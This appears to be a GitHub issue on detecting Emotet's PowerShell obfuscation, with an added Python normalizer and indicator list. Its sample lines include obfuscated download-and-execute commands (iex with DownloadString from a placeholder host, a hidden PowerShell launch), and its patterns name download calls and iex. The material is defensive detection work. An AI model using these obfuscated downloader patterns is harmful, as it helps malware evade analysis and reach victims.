Closed Omodaka9375 closed 3 years ago
These are some of the techniques used in Emotet PowerShell to obfuscate the code and make analysis difficult.

Using ` or ^ (escape character) in front of a character, with no change in the result when starting PowerShell from cmd.exe:

```powershell
$YYU."Do`WnlOadFI`le"($asfc."ToStri`Ng"(), $SDC);
```

Using the iex alias to invoke the PowerShell command:

```powershell
($env:comSpeC[4,26,25]-JoIn'')   # --> iex
PowerShell ${ENV:comspeC}[4,26,25]-join'' item (env:Opg).value)
```

Strings are concatenated using '+' to reduce readability.

Strings encoded as ASCII codes, e.g. [chaR]34.

File downloader or string downloader in macro.

Detection points:

- ` , ^ or + for concatenation
- env:comspec[4,26,25]
- -rep /rep
- DownloadFile, DownloadScript calls or http/s string in args
We'll implement these things using YARA in the future from v1 onwards.
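Added example, not code from the issue, the project, or any Emotet sample: a Python normalizer that reverses the tricks listed above on a captured command line (drops no-op backtick and caret escapes, resolves the `$env:comspec[...]-join''` index trick, decodes `[char]NN`, folds `'a'+'b'` chains) and then matches the detection points on the cleaned text. Assumptions: `COMSPEC` is the default `C:\Windows\system32\cmd.exe` (the index trick only resolves against that exact value); `DownloadString` and `DownloadData` are checked next to the `DownloadFile` named in the issue because they are the other WebClient download methods; carets are stripped on the assumption the line was captured at cmd.exe; the two-hit `suspicious` threshold is arbitrary. All sample lines except the first (the issue's own snippet) are constructed.

```python
"""Normalize Emotet-style obfuscated PowerShell command lines and flag the
detection points listed in the issue.  Added example, not project code; the
sample command lines at the bottom are constructed for illustration."""
import re
from typing import Dict, List, Tuple

# Assumed %COMSPEC% of a default Windows install.  The index trick in the
# issue ($env:comspec[4,26,25] -join '' -> "iex") only resolves against this
# exact string, so read os.environ["COMSPEC"] when running on the host itself.
COMSPEC = r"C:\Windows\system32\cmd.exe"

# Backtick escapes that change the meaning of a PowerShell string.  A backtick
# before any other character (Do`WnlOadFI`le) is a no-op used for obfuscation.
REAL_ESCAPES = set("0abefnrtuv`\"$")

_COMSPEC_IDX = re.compile(r"\$\{?env:comspec\}?\s*\[\s*([\d,\s]+)\]\s*-join\s*(?:''|\"\")", re.I)
_CHAR_CAST = re.compile(r"\[char\]\s*(\d+)", re.I)
_STR = r"(?:'([^']*)'|\"([^\"]*)\")"          # assumes no escaped quotes inside literals
_CONCAT = re.compile(_STR + r"\s*\+\s*" + _STR)
# Indicators checked on the normalized text.  DownloadString/DownloadData are
# WebClient methods added here alongside the DownloadFile named in the issue.
_INDICATORS = {
    "download_call": re.compile(r"\.\s*[\"']?Download(?:File|String|Data)[\"']?\s*\(", re.I),
    "url_string": re.compile(r"https?://", re.I),
    "replace_operator": re.compile(r"(?<![\w-])-rep(?:lace)?\b", re.I),
    "iex": re.compile(r"(?<![\w-])(?:iex|invoke-expression)\b", re.I),
}


def strip_noop_escapes(cmd: str) -> Tuple[str, int]:
    """Drop PowerShell backticks that escape nothing, and cmd.exe carets."""
    out, removed = [], 0
    for i, ch in enumerate(cmd):
        if ch == "`" and i + 1 < len(cmd) and cmd[i + 1] not in REAL_ESCAPES:
            removed += 1                  # no-op backtick: keep only the next char
        elif ch == "^":
            removed += 1                  # cmd.exe strips carets before PowerShell starts
        else:
            out.append(ch)
    return "".join(out), removed


def resolve_comspec_index(cmd: str) -> Tuple[str, int]:
    """Replace $env:comspec[i,j,k]-join'' with the literal it evaluates to."""
    hits = 0

    def repl(m: re.Match) -> str:
        nonlocal hits
        hits += 1
        idx = [int(x) for x in m.group(1).split(",") if x.strip()]
        return "'" + "".join(COMSPEC[i] for i in idx if 0 <= i < len(COMSPEC)).lower() + "'"

    return _COMSPEC_IDX.sub(repl, cmd), hits


def decode_char_casts(cmd: str) -> Tuple[str, int]:
    """Turn [char]34 into the quoted character it produces."""
    hits = 0

    def repl(m: re.Match) -> str:
        nonlocal hits
        hits += 1
        c = chr(int(m.group(1)))
        return '"' + c + '"' if c == "'" else "'" + c + "'"

    return _CHAR_CAST.sub(repl, cmd), hits


def fold_concats(cmd: str) -> Tuple[str, int]:
    """Join 'a'+'b' chains into one literal, repeating until nothing changes."""
    folds = 0

    def repl(m: re.Match) -> str:
        nonlocal folds
        folds += 1
        left = m.group(1) if m.group(1) is not None else m.group(2)
        right = m.group(3) if m.group(3) is not None else m.group(4)
        return "'" + (left + right).replace("'", "''") + "'"

    while True:
        cmd, n = _CONCAT.subn(repl, cmd)
        if n == 0:
            return cmd, folds


def analyze(cmd: str) -> Dict[str, object]:
    """Normalize one command line and return the detection points it hits."""
    norm, ticks = strip_noop_escapes(cmd)
    norm, comspec_hits = resolve_comspec_index(norm)
    norm, char_hits = decode_char_casts(norm)
    norm, folds = fold_concats(norm)
    findings: List[str] = []
    if ticks:
        findings.append("noop_escapes")
    if comspec_hits:
        findings.append("comspec_index_iex")
    if char_hits:
        findings.append("char_cast")
    if folds:
        findings.append("string_concat")
    findings += [name for name, rx in _INDICATORS.items() if rx.search(norm)]
    # Threshold is an assumption for this example: a single hit (e.g. a lone
    # -replace) is common in benign scripts, two or more rarely are.
    return {"normalized": norm, "findings": findings, "suspicious": len(findings) >= 2}


# Constructed samples: the first is the snippet from the issue, the next three
# are made up here in the same style, the last is a benign line.
SAMPLES = [
    r'$YYU."Do`WnlOadFI`le"($asfc."ToStri`Ng"(), $SDC);',
    r"&( ${ENV:comspeC}[4,26,25]-join'' ) ((New-Object Net.WebClient).DownloadString(('ht'+'tp://exa'+'mple.invalid/p.ps1')))",
    r"$SDC = $env:TEMP + [chaR]92 + ('kl'+'m.exe'); $asfc = ('h!!p://exa'+'mple.invalid') -replace '!!','tt'",
    r"cmd.exe /c pow^ersh^ell -w hi^dden -c $x",
    r"Get-ChildItem C:\Windows\Temp | Where-Object { $_.Length -gt 1mb }",
]

if __name__ == "__main__":
    for s in SAMPLES:
        r = analyze(s)
        print(f"{'SUSPICIOUS' if r['suspicious'] else 'ok        '} {r['findings']}\n    {r['normalized']}")
```

The third sample shows the limit of pure text normalization: the `-replace '!!','tt'` that would turn `h!!p://` into a URL is flagged as an operator but not evaluated, so the `url_string` indicator does not fire on it. Running the normalized text through a second stage (or through real evaluation in a sandbox) is what the YARA rules mentioned above would need for such cases.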